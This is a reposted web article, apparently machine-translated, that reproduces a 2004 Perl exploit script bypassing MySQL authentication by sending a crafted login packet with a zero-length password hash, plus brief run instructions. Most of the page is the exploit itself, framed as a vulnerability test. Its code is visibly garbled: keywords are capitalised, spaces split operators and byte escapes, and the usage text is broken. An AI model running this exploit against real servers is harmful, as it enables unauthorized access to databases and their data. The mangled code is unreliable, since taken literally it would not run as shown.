Use a zero-length password to bypass MySQL Authentication

Source: Internet
Author: User
Tags perl script

An old article on www.2cto.com has not been posted yet

The user uses a specially crafted authentication data packet
The password authentication of the database may be bypassed.
 
Note: To use this script, MySQL listeners must allow
IP address connection.
The following is a test script to detect vulnerabilities
#! /Usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# The login packet sent to the server and it's reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# Elik beyondsecurity com
#
Use strict;
Use IO: Socket: INET;
Usage () unless (@ ARGV> = 1) | (@ ARGV <= 3 ));
My $ username = shift (@ ARGV );
My $ host = shift (@ ARGV );
If (! $ Host)
{
Usage ();
}
My $ port = shift (@ ARGV );
If (! $ Port)
{
$ Port = 3306; print "Using default MySQL port (3306) \ n ";
}
# Create the socket
My $ socket = IO: Socket: INET-> new (proto => 'tcp ', PeerAddr => $ host, PeerPort => $ port );
$ Socket or die "Cannot connect to host! \ N ";
# Receive greeting
My $ reply;
Recv ($ socket, $ reply, 1024, 0 );
If (length ($ reply) <7)
{
Print "Not allowed to connect to MySQL! \ N ";
Exit (1 );
}
Print "Received greeting: \ n ";
HexDump ($ reply );
Print "\ n ";
# Here we define the login OK reply
# My $ login_ OK = "\ x01 \ x00 \ x00 \ x02 \ xFE ";
# Break the username string into chars and rebuild it
My $ binuser = pack ("C *", unpack ("C *", $ username ));
# Send login caps packet with password
My $ packet = "\ x85 \ xa6 ".
"\ X03 \ x00 \ x00 ".
"\ X00 ".
"\ X00 \ x01 \ x08 \ x00 \ x00 \ x00". # capabilities, max packet, etc ..
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x00 \ x00 \ x00". $ binuser. "\ x00 \ x14 \ x00 \ x00 \ x00 \ x00". # username and pword hash length + NULL hash
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00"; # continue NULL hash
Substr ($ packet, 0, 0) = pack ("C1", length ($ packet )). "\ x00 \ x00 \ x01"; # MySQL message length + packet number (1)
Print "Sending caps packet: \ n ";
HexDump ($ packet );
Print "\ n ";
Send $ socket, $ packet, 0;
# Receive reply
Recv ($ socket, $ reply, 1024, 0 );
Print "replicated ed reply: \ n ";
HexDump ($ reply );
My @ list_bytes = unpack ("C *", $ reply );
# Print "The th byte is:", $ list_bytes [4], "\ n ";
If (length (@ list_bytes)> = 4)
{
Print "Response insufficent \ n ";
}
# If ($ reply eq $ login_ OK)
If ($ list_bytes [4] = 0 | $ list_bytes [4] = 254)
{
Print "Received OK reply, authentication successful !! \ N ";
}
Else
{
Print "Authentication failed! \ N ";
}
# Close
Close ($ socket );
 
Sub usage
{
# Print usage information
Print "\ nUsage: mysql_auth_bypass_zeropass.pl <username> <Username>-The DB username to authenticate
<Host>-The host to connect
[Port]-The TCP port which MySQL is listening on (optional, default is 3306) \ n ";
Exit (1 );
}
 
###
# Do a hexdump of a string (assuming it's binary)
###
Sub HexDump
{
My $ buffer =$ _ [0];
# Unpack it into chars
My @ up = unpack ("C *", $ buffer );
My $ pos = 0;
# Calculate matrix sizes
My $ rows = int (@ up/16 );
My $ leftover = int (@ up % 16 );
For (my $ row = 0; $ row <$ rows; $ row ++, $ pos + = 16)
{
Printf ("% 08X \ t", $ pos );
My @ values = @ up [$ pos... $ pos + 15];
My @ line;
Foreach my $ val (@ values)
{
Push (@ line, sprintf ("% 02X", $ val ));
}
Print join ('', @ line)," \ n ";
}
# Print last line
Printf ("% 08X \ t", $ pos );
My @ values = @ up [$ pos... $ pos + $ leftover-1];
My @ line;
Foreach my $ val (@ values)
{
Push (@ line, sprintf ("% 02X", $ val ));
}
Print join ('', @ line)," \ n ";
}
# Milw0rm.com [2004-07-10]
 
Because perl is used for invocation, the system must first install the perl compiler, and the path of the first line of the script must exist.
Run:
For more information, see "test", and then "chmod + x test ".
# Test root hostname.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.